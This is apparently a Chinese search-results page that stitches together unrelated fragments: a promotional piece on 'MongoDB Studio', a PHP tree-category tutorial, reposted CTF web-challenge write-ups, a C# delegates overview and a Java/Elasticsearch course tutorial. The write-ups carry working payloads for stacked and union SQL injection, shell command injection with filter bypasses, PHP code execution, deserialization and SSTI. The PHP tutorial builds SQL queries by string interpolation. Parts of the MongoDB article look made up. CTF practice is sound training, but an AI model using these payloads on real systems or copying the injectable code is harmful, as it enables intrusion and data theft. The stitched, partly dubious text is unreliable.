[利用 elemMatch操作符处理数组型...]的搜索结果

...其灵活性和高性能，在处理非结构化、半结构化数据方面发挥着关键作用。MongoDB，这个家伙可不简单，它独创的文档型数据模型设计，就像给数据库装上了超级马达，让信息处理变得灵活又高效。加上那让人拍案叫绝的超强扩展能力，轻轻松松就捕获了全球各地开发者的心，让他们纷纷对MongoDB爱不释手，赞不绝口呢！不过呢，你知道的，不是所有开发者都擅长用命令行或者编程接口去摆弄数据库，这玩意儿对非专职的数据库管理员来说，难度系数有点高。所以嘞，一个瞅着就明白、操作简单的可视化界面，对他们来讲，那就跟救命稻草一样重要哇！嘿，伙伴们，今天咱们就来聊聊MongoDB怎么利用一个超级给力的工具——MongoDB Studio，给大伙儿搭建一个可视化操作台。这样一来，不管是管理还是操作MongoDB数据库，都能变得轻松又高效，让数据管理跟玩似的！ 二、MongoDB Studio简介 MongoDB Studio 是一款由 MongoDB 官方推出的跨平台图形化数据库管理工具，它不仅具备基本的数据导入导出功能，更提供了丰富的查询构建器、实时监控、数据模型设计以及数据迁移等功能，大大简化了用户对MongoDB集群的日常维护与应用开发工作流程。它的出现犹如一把钥匙，打开了连接MongoDB世界与业务场景之间的一扇大门。 三、MongoDB Studio 功能解析 1. 数据建模与设计 - 首先，让我们通过实例感受MongoDB Studio的直观性。假设我们要在名为 users 的集合中建立一个新的用户文档类型，打开MongoDB Studio，点击 "Collections" -> "Create Collection"，输入新集合名称 new_users。接着，在右侧的Document Schema区域，可以通过拖拽字段图标并填写字段名、数据类型（如String, Number, Date等），定义新的用户文档结构： { "_id": ObjectId(), "username": String, "email": {type: String, required: true}, "password": {type: String, required: true, min: 6}, "createdAt": Date, "updatedAt": Date } 2. 查询构建与执行 - 当我们需要从 new_users 集合中查找特定条件的记录时，MongoDB Studio的Query Builder功能大显身手。在 "Query Builder" 区域，选择 "Find" 操作，键入查询条件，例如找到邮箱地址包含 "@example.com" 的用户： db.new_users.find({"email": {$regex: /@example\.com$/} }) 3. 数据操作与管理 - 对于数据的增删改查操作，MongoDB Studio同样提供了便捷的操作界面。例如，在 "Data Editor" 中选择需要更新的文档，点击 "Update" 按钮，并设置新的属性值，如将用户名 "Alice" 更新为 "Alicia": db.new_users.updateOne( {"username": "Alice"}, {"$set": {"username": "Alicia"} } ) 4. 性能监控与调试 - 而对于数据库的整体性能指标，MongoDB Studio还集成了实时监控模块，包括CPU、内存、磁盘I/O、网络流量等各项指标，便于管理员快速发现潜在瓶颈，并针对性地进行优化调整。 四、结论与展望 MongoDB Studio作为一个集数据建模、查询构建、数据操作于一体的全面管理工具，极大地提升了用户在MongoDB环境下的工作效率。而且你知道吗，MongoDB这个大家庭正在日益壮大和成熟，那些聚合管道、索引优化、事务处理等高大上的功能，都将一步步被融入到MongoDB Studio里头去。这样一来，咱们管理数据库就能变得更聪明、更自动化，就像有个小助手在背后默默打理一切，轻松又省力！嘿，伙计们，咱们一起热血沸腾地站在技术革命的浪尖上，满怀期待地瞅瞅MongoDB Studio能给我们带来什么惊艳的新玩意儿吧！这货绝对会让广大的开发者小伙伴们更溜地驾驭MongoDB，让企业的数据战略发展如虎添翼，一路飙升！

... 四、如何使用递归来处理无限极分类？ 五、不使用递归，如何处理无限极分类？ 六、案例分析 七、结论 八、参考资料 一、引言 在日常工作中，我们经常需要对一些数据进行分类，例如商品分类、用户等级等。其中，无限极分类是一种非常常用的数据分类方式，它可以用来表示一种层次结构，如商品分类中的父类、子类等。然而，在处理这种数据时，我们常常会遇到一个问题：如何快速、有效地将无限极分类转换为层级结构呢？ 二、为什么要使用无限极分类？ 首先，我们需要了解一下什么是无限极分类。无限极分类就像一棵大树，它的构造挺有趣。在这样的树形结构中，每一个小节点都有一个自己的‘老爹’节点，而这个‘老爹’呢，它还可能是其他许多小节点的‘老爹’。这样的构造方式，其实就像家谱一样，可以展示出各种级别的层次关系。比如说在商品分类里，就有爷爷辈的大类别、爸爸辈的中类别、儿子辈的小类别，甚至还有孙子辈的更细分的类别呢！ 其次，无限极分类的优点在于它可以方便地进行扩展。假如我们想要新增一个类别，就像在家族树上添个新枝丫一样简单，你只需要在它的“老爸”类别下加一个新的“小子类别”，这样一来，数据的一致性和完整性就能轻轻松松地保持住啦！ 三、什么是递归？ 那么，如何使用递归来处理无限极分类呢？这就需要用到递归的概念。递归啊，就是那种函数自己调用自己的神奇操作。你想象一下，这个函数有点像一个超级有耐心的小助手，一遍又一遍地做着同一件事情，但每次做的时候都比上次更进一步。通过这种自我迭代的过程，我们竟然能解开很多看起来超级复杂、让人挠头的问题呢！ 在处理无限极分类时，我们可以使用递归的方式，从根节点开始，一层一层地遍历下去，直到找到所有的叶子节点。然后，我们可以根据每层的节点，构建出相应的层级结构。 四、如何使用递归来处理无限极分类？ 接下来，我们来看一下如何使用递归来处理无限极分类。假设我们有一个无限极分类的数据库表，其中包含id、parent_id和name三个字段。喏，你听我说哈，id呢，就相当于每个小节点的身份证号，是独一无二的。而parent_id呢，顾名思义，就是每个小节点它爹——父节点的身份证号啦。至于name嘛，简单易懂，那就是给每个小节点起的专属昵称哈！ 我们可以定义一个函数，输入参数是一个父节点的id，输出是一个层级结构的数组。具体操作如下： php function getTree($id){ $sql = "SELECT FROM node WHERE parent_id = '$id'"; $result = mysqli_query($conn, $sql); $arr = array(); while($row = mysqli_fetch_assoc($result)){ $arr[] = $row; } foreach($arr as $value){ if($value['child'] > 0){ $arr = array_merge($arr, getTree($value['id'])); } } return $arr; } 以上就是使用递归来处理无限极分类的一个简单示例。这个例子嘛，我们先从某个特定的老爸节点下手，把它的所有小崽子（子节点）都给挖出来。接着呢，对每一个小崽子，如果它们自己还有更下一代的小崽子，那我们就得像孙悟空钻进葫芦娃的肚子里那样，一层层地往里递归调用这个过程，把那些隐藏更深的孙子辈节点也给找全了。最后呢，咱们把这一大家子所有的节点都聚到一块儿，拼成一个完整的、层层分明的家族结构。 然而，递归虽然强大，但也有它的局限性。当数据量大时，递归可能会导致栈溢出，影响程序的执行效率。因此，我们需要寻找其他的解决方案。 五、不使用递归，如何处理无限极分类？ 那么，如果不使用递归，我们该如何处理无限极分类呢？答案就是使用非递归的方式，也就是我们常说的迭代法。 迭代法的基本思想是从根节点开始，每次只处理一层数据，直到处理完所有的数据。这种方法压根儿不需要递归调用，所以你完全不用担心什么栈溢出的问题。而且实话跟你说，通常情况下，它的工作效率要比递归高不少！ 接下来，我们来看一下如何使用迭代法处理无限极分类。假设我们已经有了一个无限极分类的数据库表，其中包含id、parent_id和name三个字段。我们可以按照以下步骤进行处理： 1. 创建一个空的层级结构数组，用于存储所有的节点； 2. 获取根节点，将其添加到层级结构数组中； 3. 遍历所有的节点，对于每一个节点，如果它还没有被处理过，则对其进行处理，将其添加到层级结构数组中，然后处理它的所有子节点。 具体的代码实现如下： php function getTree($root){ $tree = array(); $queue = array($root); while(count($queue) > 0){ $node = array_shift($queue); $tree[$node['id']] = array( 'id' => $node['id'], 'parent_id' => $node['parent_id'], 'name' => $node['name'], 'children' => array() ); if($node['child'] > 0){ $queue = array_merge($queue, getChildren($conn, $node['id'])); } } return $tree; } function getChildren($conn, $id){ $sql = "SELECT FROM node WHERE parent_id = '$id'"; $result = mysqli_query($conn, $sql); $arr = array(); while($row = mysqli_fetch_assoc($result)){ $arr[] = $row; } return $arr; } 以上就是在非递归的情况下，处理无限极分类的一个简单示例。在举这个例子的时候，我们首先动手整了个空荡荡的层级结构数组出来，接着找准了那个根节点，把它给塞进了这个层级结构数组里头。然后，我们就像在超市排队结账一样，用一个队列来装那些等待被处理的节点。每当轮到一个节点时，我们就把它从队列里拽出来，塞进层级结构数组这个大篮子里，并且仔仔细细地处理它所有的“孩子”——也就是子节点。最后一步，咱们就像玩接龙游戏一样，把已经处理过的节点从队列里拿出来，然后美滋滋地接着处理下一个排着队的节点，就这么一直玩下去，直到队列里一个节点都不剩，就表示大功告成了！ 总结来说，无论是使用递归还是非递归，都可以有效地处理无限极分类。但是，不同的方法适用于不同的场景，我们需要根据实际情况选择合适的方法。

...单引号过滤 2.查看字段 （为2） 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来，这个符号是 esc下面一个的按键，这个符号在mysql里 用于 分割其他命令，表示此为（表名、字段名） 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢？ select 函数被过滤了，其实mysql的函数有很多 这里通过 MYSQL的预处理语句，使用 : concat（'s','elect',' from 1919810931114514'） 完成绕过 构造pyload： 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字，字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说，没有回显，联合查询基本没戏。 好在页面会进行相应的变化，证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回，一种是空白，一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母（除过滤的关键词外）都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符，不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接，但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式：pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接，而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候，mysql也可以把 || 作为字符串拼接。 修改完后，|| 就会被认为是字符串拼接符 MySQL中sql_mode参数，具体的看这里 解题思路1： payload：,1 查询语句：select ,1||flag from Flag 解题思路2： 堆叠注入，使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析： 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式：pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入：1’ 为'闭合 2.看字段：1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ，太像了，增加了过滤规则。 修改表名和set均不可用，所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据，也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了：cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x，低于7.3.16的7.3.x和低于7.4.4的7.4.x中，将get_headers（）与用户提供的URL一起使用时，如果URL包含零（\ 0）字符，则URL将被静默地截断。这可能会导致某些软件对get_headers（）的目标做出错误的假设，并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点： cve-2020-7066利用 老套路：先F12查看源码 发现提示：Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾，这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点： .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素，并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节，看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");} }else{die("再好好想想！");} }else{die("还想读flag，臭弟弟！");} }// highlight_file(__FILE__);?> 既然getshell基本不可能，那么考虑读源码 看源码，flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件，例如： <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数： localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点： current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步：读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下，利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数，此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由，就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的，参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的，名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象，hexdigest()是获得加密后的16进制字符串 urllib.unquote(） 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog，且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了：secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为：fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入： /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目： 1.tornado是一个python的模板，可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息，想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞，尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入： 查字段：1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表： [GXYCTF2019]Ping Ping Ping 考察：RCE的防护绕过 直接构造：?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格，使用拼接变量来拼接出Flag字符串： 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么：?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥，flag字眼也过滤了，bash也没了，不过sh没过滤： 继续构造payload： ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码，得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass，具体看这里 HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符2.将某些字符转换为下划线（包括空格） scandir()：列出参数目录中的文件和目录 发现/被过滤了 ，可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload： 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典，要带路径 -r 递归跑(查到一个目录后，重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道，如果password=100，username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时，属性个数的值大于实际属性个数时，就可以 2.private修饰符的问题 private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover， 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法： flask session 伪造 具体，看这里 flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显： 1' uniunionon selselectect 1,2,3 over！正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接：https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...得开发者能够更高效地处理事件和委托，进一步提升代码质量和可维护性。通过自定义源生成器，可以动态创建委托实例并自动绑定相关事件，从而减少手动编写重复代码的工作量。 此外，委托还在并发和多线程编程场景下发挥关键作用，如Task类和async/await关键字背后就依赖于委托来实现异步方法的调用和状态管理。微软在.NET生态系统中提倡采用异步编程模型，利用C的事件和委托机制，能够简化异步操作的处理流程，提高程序性能和响应速度。 对于设计模式层面的理解，委托与观察者模式（Observer Pattern）紧密相连，它允许对象之间的一对多依赖关系，当一个对象的状态发生改变时，所有依赖于它的对象都会得到通知并自动更新。结合最新的.NET技术趋势，诸如Reactive Extensions (Rx.NET)等库更是将这种模式发扬光大，借助LINQ风格的查询操作符和事件流处理，让委托在实时数据流处理领域展现出了强大的功能。 总之，深入掌握C中的委托和事件不仅有助于日常开发工作的效率提升，更能紧跟现代软件工程的发展潮流，充分利用最新的技术和框架优势，构建出高性能、高可维护性的应用程序。而不断跟进官方文档、社区讨论和技术博客，则是深化此类主题理解和实践运用的有效途径。

...用 课程计划媒资信息查询接口，获取该课程计划的视频播放的 m3u8 url地址，并返回给前端，前端使用该 url 进行视频的在线播放。 在线学习完整的测试流程：媒资信息的上传、选择、发布到前端门户、搜索门户测试，在线学习的播放视频。 目录 内容会比较多，小伙伴门可以根据目录进行按需查阅。 文章目录 😎 知识点概览 目录 一、学习页面：查询课程计划 0x01 需求分析 0x02 Api接口 0x03 服务端开发 Controller Service 测试 0x04 前端开发 配置NGINX虚拟主机 前端 API 方法 前端 API 方法调用 测试 二、学习页面：获取视频播放地址 0x01 需求分析 0x02 课程发布：储存媒资信息 需求分析 数据模型 Dao Service 测试 0x03 Logstash：扫描课程计划媒资 创建索引 创建模板文件 配置 mysql.conf 启动 logstash.bat Logstash多实例运行 0x04 搜素服务：查询课程媒资接口 需求分析 Api接口定义 Service Controller 测试 三、在线学习：接口开发 0x01 需求分析 0x02 搭建开发环境 0x03 Api接口 0x04 服务端开发 需求分析 搜索服务注册Eureka 搜索服务客户端 自定义错误代码 Service Controller 测试 0x05 前端开发 需求分析 api方法 配置代理 视频播放页面 简单的测试 完整的测试 1、上传文件 一些问题 ~~方案1：删除本地分块文件重新尝试上传~~ 方案2：检查前端提交的MD5值是否正确 2、为课程计划选择媒资信息 3、前端门户测试 四、待完善的一些功能 😁 认识作者 一、学习页面：查询课程计划 0x01 需求分析 到目前为止，我们已可以编辑课程计划信息并上传课程视频，下一步我们要实现在线学习页面动态读取章节对应的视频并进行播放。在线学习页面所需要的信息有两类： 课程计划信息 课程学习信息（视频地址、学习进度等） 如下图： 在线学习集成媒资管理的需求如下： 1、在线学习页面显示课程计划 2、点击课程计划播放该课程计划对应的视频 本章节实现学习页面动态显示课程计划，进入不同课程的学习页面右侧动态显示当前课程的课程计划。 0x02 Api接口 课程计划信息从哪里获取？ 在课程发布完成后会自动发布到一个 course_pub 的表中，logstash 会自动将课程发布后的信息自动采集到 ES 索引库中，这些信息也包含课程计划信息。 所以考虑性能要求，课程发布后对课程的查询统一从 ES 索引库中查询。 前端通过请求 搜索服务 获取课程信息，需要单独在 搜索服务 中定义课程信息查询接口。 本接口接收课程id，查询课程所有信息返回给前端。 我们在搜素服务 API 下添加以下方法 @ApiOperation("根据id搜索课程发布信息")public Map<String,CoursePub> getdetail(String id); 返回的课程信息为 json 结构：key 为课程id，value 为课程内容。 0x03 服务端开发 在搜索服务中开发查询课程信息接口。 Controller 在搜素服务下添加以下方法 / 根据id搜索课程发布信息 @param id 课程id @return JSON数据/@Override@GetMapping("/getdetail/{id}")public Map<String, CoursePub> getdetail(@PathVariable("id")String id) {return esCourseService.getdetail(id);} Service / 根据id搜索课程发布信息 @param id 课程id @return JSON数据/public Map<String, CoursePub> getdetail(String id) {//设置索引SearchRequest searchRequest = new SearchRequest(es_index);//设置类型searchRequest.types(es_type);//创建搜索源对象SearchSourceBuilder searchSourceBuilder = new SearchSourceBuilder();//设置查询条件,根据id进行查询searchSourceBuilder.query(QueryBuilders.termQuery("id",id));//这里不使用source的原字段过滤,查询所有字段// searchSourceBuilder.fetchSource(new String[]{"name", "grade", "charge","pic"}, newString[]{});//设置搜索源对象searchRequest.source(searchSourceBuilder);//执行搜索SearchResponse searchResponse = null;try {searchResponse = restHighLevelClient.search(searchRequest);} catch (IOException e) {e.printStackTrace();}//获取搜索结果SearchHits hits = searchResponse.getHits();SearchHit[] searchHits = hits.getHits(); //获取最优结果Map<String,CoursePub> map = new HashMap<>();for (SearchHit hit: searchHits) {//从搜索结果中取值并添加到coursePub对象Map<String, Object> sourceAsMap = hit.getSourceAsMap();String courseId = (String) sourceAsMap.get("id");String name = (String) sourceAsMap.get("name");String grade = (String) sourceAsMap.get("grade");String charge = (String) sourceAsMap.get("charge");String pic = (String) sourceAsMap.get("pic");String description = (String) sourceAsMap.get("description");String teachplan = (String) sourceAsMap.get("teachplan");CoursePub coursePub = new CoursePub();coursePub.setId(courseId);coursePub.setName(name);coursePub.setPic(pic);coursePub.setGrade(grade);coursePub.setTeachplan(teachplan);coursePub.setDescription(description);//设置map对象map.put(courseId,coursePub);}return map;} 测试 使用 swagger-ui 或 postman 测试查询课程信息接口。 0x04 前端开发 配置NGINX虚拟主机 学习中心的二级域名为 ucenter.xuecheng.com ，我们在 nginx 中配置 ucenter 虚拟主机。 学成网用户中心server {listen 80;server_name ucenter.xuecheng.com;个人中心location / {proxy_pass http://ucenter_server_pool;} } 前端ucenterupstream ucenter_server_pool{server 127.0.0.1:7081 weight=10;server 127.0.0.1:13000 weight=10;} 在学习中心要调用搜索的 API，使用 Nginx 解决代理，如下图： 在 ucenter 虚拟主机下配置搜索 Api 代理路径 